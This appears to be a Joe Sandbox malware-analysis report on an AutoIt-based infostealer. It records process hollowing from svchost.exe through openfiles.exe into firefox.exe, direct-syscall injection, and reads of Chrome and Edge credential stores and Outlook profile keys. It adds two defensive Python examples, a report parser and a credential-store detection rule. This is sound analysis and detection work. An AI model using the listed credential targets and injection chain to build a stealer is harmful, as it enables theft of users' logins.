Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtTerminateThread: Direct from: 0x76EF2FCC
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtCreateMutant: Direct from: 0x76EF35CC
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtResumeThread: Direct from: 0x76EF36AC
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtReadFile: Direct from: 0x76EF2ADC
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtDelayExecution: Direct from: 0x76EF2DDC
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtResumeThread: Direct from: 0x76EF2FBC
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtCreateUserProcess: Direct from: 0x76EF371C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtOpenKeyEx: Direct from: 0x76EF3C9C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtSetInformationThread: Direct from: 0x76EE63F9
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | NtCreateKey: Direct from: 0x76EF2C6C
Source: C:\Users\user\Desktop\F2024-202202.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\openfiles.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: NULL target: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe protection: read write
Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: NULL target: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\openfiles.exe | Thread register set: target process: 5004
Source: C:\Windows\SysWOW64\openfiles.exe | Thread APC queued: target process: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
Source: C:\Users\user\Desktop\F2024-202202.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2823008
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001D8C93 LogonUserW
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_00183B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_00184A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001E4EC9 mouse_event
Source: C:\Users\user\Desktop\F2024-202202.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\F2024-202202.exe"
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
Source: C:\Windows\SysWOW64\openfiles.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001E4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: F2024-202202.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: HCyQCFLUGWqlxNRVXC.exe, 00000004.00000000.2265154072.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000002.3253712582.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410459829.0000000000D21000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: F2024-202202.exe, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000000.2265154072.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000002.3253712582.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410459829.0000000000D21000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: HCyQCFLUGWqlxNRVXC.exe, 00000004.00000000.2265154072.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000002.3253712582.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410459829.0000000000D21000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: HCyQCFLUGWqlxNRVXC.exe, 00000004.00000000.2265154072.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000002.3253712582.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410459829.0000000000D21000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001A886B cpuid
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001B50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001C2230 GetUserNameW
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001B418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_00184AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
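The evidence lines in this section and the ones above it are the raw material an analyst has to turn into a picture: the svchost.exe functions that read the PEB through fs:[30h], the Nt* services that HCyQCFLUGWqlxNRVXC.exe issues as direct syscalls (NtWriteVirtualMemory, NtMapViewOfSection, NtProtectVirtualMemory, NtResumeThread, NtCreateUserProcess among them), and the section-mapping and APC events that chain F2024-202202.exe into svchost.exe, from there into HCyQCFLUGWqlxNRVXC.exe and openfiles.exe, and from openfiles.exe into firefox.exe. The following parser is an added example, not Joe Sandbox code: it consumes the flattened text form of these report lines (process path glued to the event name, "Jump to behavior" link text appended) and extracts those three views. SAMPLE_REPORT is a constructed subset of the lines on this page; the event-kind list and the set of injection-relevant syscalls are the author's choices, not a Joe Sandbox definition.

```python
"""Triage helper for the flattened text of a Joe Sandbox behaviour report (added example,
not Joe Sandbox code). Lines arrive as "Source: <process><event>: <detail>" with the event
name glued to the process path and "Jump to behavior" link text appended; an optional
" | " separator is also accepted. SAMPLE_REPORT is a constructed subset of this page."""
import re
from collections import Counter, defaultdict, deque
from dataclasses import dataclass

EVENT_KINDS = ("Code function", "Section loaded", "Thread APC queued", "Thread register set",
               "Memory written", "Process created", "File opened", "Key opened")
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)\s*\|?\s*"                                    # process path
    r"(?P<kind>" + "|".join(map(re.escape, EVENT_KINDS)) + r"|Nt[A-Za-z]+):\s*"  # event or Nt* name
    r"(?P<detail>.*?)\s*(?:Jump to behavior)?$")                                # drop link residue
FUNC_RE = re.compile(r"^(?P<fid>\d+_\d+_[0-9A-F]+)\s+(?P<body>.*?)(?P=fid)?$")  # "<id> <apis><id>"
TARGET_RE = re.compile(r"(?:target process:|target:|^)\s*(?P<target>[A-Z]:\\.+?\.exe)"
                       r"(?:\s+protection:\s*(?P<prot>.+))?")
PEB_READ = "fs:[00000030h]"  # TEB+0x30 holds the PEB pointer in a 32-bit process
# Direct Nt* calls that are the building blocks of the injection this report shows (author's list)
INJECTION_SYSCALLS = frozenset({
    "NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtProtectVirtualMemory",
    "NtMapViewOfSection", "NtResumeThread", "NtCreateUserProcess", "NtSetInformationThread"})

# Constructed sample: a subset of the report lines on this page, in their flattened form
SAMPLE_REPORT = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]2_2_03468A90
Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001AA364 SetUnhandledExceptionFilter,0_2_001AA364
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtClose: Direct from: 0x76EF2B6C
Source: C:\Users\user\Desktop\F2024-202202.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\openfiles.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\openfiles.exeThread APC queued: target process: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeJump to behavior
Source: C:\Users\user\Desktop\F2024-202202.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\F2024-202202.exe"Jump to behavior
"""

@dataclass(frozen=True)
class Finding:
    source: str   # process the behaviour was observed in
    kind: str     # event type, or the Nt* service name for a direct-syscall line
    detail: str

def parse_line(line):
    m = LINE_RE.match(line.strip())
    return Finding(m["src"], m["kind"], m["detail"]) if m else None

def parse_report(text):
    return [f for f in map(parse_line, text.splitlines()) if f]

def peb_reads(findings):
    """Per process: how many times each function reads the PEB (fs:[30h])."""
    per_proc = defaultdict(Counter)
    for f in findings:
        fm = FUNC_RE.match(f.detail) if f.kind == "Code function" else None
        if fm and PEB_READ in fm["body"]:
            per_proc[f.source][fm["fid"]] += 1
    return per_proc

def direct_syscalls(findings):
    """Per process: Nt* services the sandbox saw invoked as direct syscalls."""
    per_proc = defaultdict(set)
    for f in findings:
        if f.kind.startswith("Nt") and f.detail.startswith("Direct from:"):
            per_proc[f.source].add(f.kind)
    return per_proc

def injection_edges(findings):
    """(injector, target, protection) for each cross-process map, write or APC."""
    edges = []
    for f in findings:
        if f.kind in ("Section loaded", "Thread APC queued", "Memory written"):
            tm = TARGET_RE.search(f.detail)
            if tm:
                edges.append((f.source, tm["target"], tm["prot"]))
    return edges

def injection_chain(edges, root):
    """Processes reachable from root along injection edges, in BFS order."""
    seen, order, queue = {root}, [root], deque([root])
    while queue:
        cur = queue.popleft()
        for src, dst, _ in edges:
            if src == cur and dst not in seen:
                seen.add(dst); order.append(dst); queue.append(dst)
    return order

if __name__ == "__main__":
    fs = parse_report(SAMPLE_REPORT)
    for proc, calls in direct_syscalls(fs).items():
        print(proc.rsplit("\\", 1)[-1], "direct syscalls used for injection:", sorted(calls & INJECTION_SYSCALLS))
    chain = injection_chain(injection_edges(fs), r"C:\Users\user\Desktop\F2024-202202.exe")
    print(" -> ".join(p.rsplit("\\", 1)[-1] for p in chain))
```

Run as a script it prints the injection-relevant direct syscalls per process and the chain F2024-202202.exe -> svchost.exe -> HCyQCFLUGWqlxNRVXC.exe -> openfiles.exe -> firefox.exe. Joe Sandbox also exports structured (XML/JSON) reports, which are the better input when available; this parser is for the case where only the rendered page survives. Note that an edge with protection "read write" followed by one with "execute and read and write" on the same target (openfiles.exe into firefox.exe above) is the usual two-step map of a payload followed by making it executable.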

            Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\openfiles.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\openfiles.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\openfiles.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\openfiles.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\openfiles.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\openfiles.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\openfiles.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\openfiles.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\openfiles.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: F2024-202202.exe | Binary or memory string: WIN_81
Source: F2024-202202.exe | Binary or memory string: WIN_XP
Source: F2024-202202.exe | Binary or memory string: WIN_XPe
Source: F2024-202202.exe | Binary or memory string: WIN_VISTA
Source: F2024-202202.exe | Binary or memory string: WIN_7
Source: F2024-202202.exe | Binary or memory string: WIN_8
Source: F2024-202202.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
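The file and registry opens above are the observable side of the credential theft: openfiles.exe, a Windows utility that has no business reading browser profiles, opens Chrome's and Edge's Login Data, Web Data, Cookies and Local State and then the Outlook MAPI profile key. That combination, a non-browser process touching Chromium credential stores and a non-mail-client process reading the Windows Messaging Subsystem profile tree in the same short window, is what endpoint detection should key on. The rule below is an added example, not part of the Joe Sandbox report: it runs over constructed file-open and registry-open events modelled on the lines above plus benign browser and Outlook activity for contrast. The event schema (ts, pid, image, op, path) is an assumption; Windows does not log file reads by default, so this needs EDR or ETW file-activity telemetry mapped onto those fields.

```python
"""Detection over endpoint file-open / registry-open events: a process that is not the
owning browser or mail client reading Chromium credential stores or the Outlook MAPI
profile (added example, not from the report). The event schema is assumed; Windows does
not log file reads by default, so this needs EDR or ETW file-activity telemetry."""
import re
from collections import defaultdict

# Chromium credential stores: Login Data (passwords), Web Data (autofill/cards), Cookies
# (also under Network\) and Local State, which holds the DPAPI-wrapped AES key.
BROWSER_STORES = re.compile(
    r"\\(?:Google\\Chrome|Microsoft\\Edge|BraveSoftware\\Brave-Browser)\\User Data\\"
    r"(?:[^\\]+\\)?(?:Login Data|Web Data|Cookies|Network\\Cookies|Local State|Network\\Local State)$",
    re.IGNORECASE)
# MAPI profile tree read by mail-credential stealers
MAIL_PROFILE = re.compile(r"\\Windows Messaging Subsystem\\Profiles\\", re.IGNORECASE)
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe"}   # processes allowed to read their stores
MAIL_IMAGES = {"outlook.exe"}

def ev(ts, pid, image, op, path):
    return {"ts": ts, "pid": pid, "image": image, "op": op, "path": path}

OPENFILES = r"C:\Windows\SysWOW64\openfiles.exe"
CHROME_UD = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
OUTLOOK_KEY = ("HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
               "Windows Messaging Subsystem\\Profiles\\Outlook\\")
# Constructed events: the report's openfiles.exe activity plus benign browser/mail noise
EVENTS = [
    ev(0, 5004, OPENFILES, "file_open", CHROME_UD + r"\Login Data"),
    ev(1, 5004, OPENFILES, "file_open", CHROME_UD + r"\Network\Cookies"),
    ev(2, 5004, OPENFILES, "file_open", CHROME_UD + r"\Local State"),
    ev(3, 5004, OPENFILES, "file_open",
       r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    ev(4, 5004, OPENFILES, "key_open", OUTLOOK_KEY),
    ev(5, 3120, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "file_open",
       CHROME_UD + r"\Login Data"),
    ev(6, 4444, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "key_open", OUTLOOK_KEY),
    ev(7, 7000, r"C:\Windows\System32\notepad.exe", "file_open", r"C:\Users\user\Documents\notes.txt"),
]

def classify(event):
    """'browser_store' or 'mail_profile' when a foreign process touches that material, else None."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if event["op"] == "file_open" and BROWSER_STORES.search(event["path"]):
        return None if image in BROWSER_IMAGES else "browser_store"
    if event["op"] == "key_open" and MAIL_PROFILE.search(event["path"]):
        return None if image in MAIL_IMAGES else "mail_profile"
    return None

def evaluate(events, window_s=60):
    """One alert per offending pid; 'critical' when browser and mail material are both
    reached within window_s seconds (the broad-harvest pattern of an infostealer)."""
    hits = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        cat = classify(e)
        if cat:
            hits[e["pid"]].append((e["ts"], cat, e["path"], e["image"]))
    alerts = []
    for pid, rows in hits.items():
        cats = sorted({c for _, c, _, _ in rows})
        broad = len(cats) == 2 and rows[-1][0] - rows[0][0] <= window_s
        alerts.append({"pid": pid, "image": rows[0][3], "severity": "critical" if broad else "high",
                       "categories": cats, "paths": [p for _, _, p, _ in rows]})
    return alerts

if __name__ == "__main__":
    for a in evaluate(EVENTS):
        print(a["severity"], a["pid"], a["image"], a["categories"], len(a["paths"]), "objects")
```

On the constructed events only pid 5004 (openfiles.exe) alerts, at "critical", with five objects; the chrome.exe and OUTLOOK.EXE reads of the same paths are suppressed by the owner lists. In production the owner lists need the legitimate non-browser readers in your estate (backup agents, browser-sync helpers, password-manager importers) added per host role, and the image check should be backed by signer or hash, since the sample here runs as a signed Windows binary that was hollowed, so a name allow-list alone would not have helped had it chosen to hollow chrome.exe instead.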

            Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001F6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001F6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket
            MITRE ATT&CK Matrix (numbers in a cell are shown as in the report, in front of the technique they belong to)

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
